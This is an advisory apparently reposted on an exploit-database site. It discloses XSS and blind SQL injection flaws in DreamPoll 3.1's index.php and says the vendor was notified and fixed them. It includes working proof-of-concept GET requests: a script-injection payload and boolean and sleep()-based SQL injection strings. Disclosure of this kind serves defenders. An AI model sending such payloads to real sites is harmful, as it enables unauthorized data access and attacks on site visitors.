[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DreamPoll 3.1 Vulnerabilities

Author
mark
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9888
Category
web applications
Date add
08-10-2009
Platform
unsorted
=============================
DreamPoll 3.1 Vulnerabilities
=============================

During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application. Details of the vulnerabilities are as follows:
 
XSS
 
==========-
 
File: index.php
 
Variable: recordsPerPage
 
Example: GET /index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=
1>?><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>
 
Blind SQL/Xpath Injection
 
==========-
 
File: index.php
 
Variable: sortField
 
Example: GET /index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc
=1&recordsPerPage=20
 
Blind SQL Injection (Timing)
 
==========-
 
File: index.php
 
Variables: sortField, sortDesc, pageNumber
 
Example: GET /index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1
&recordsPerPage=20
 
While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this application as well. The vendor was notified on 09/28/2009 and a fix was released the same day. If you are a current user of this software, contact the vendor for the available fix.



#  0day.today [2024-12-25]  #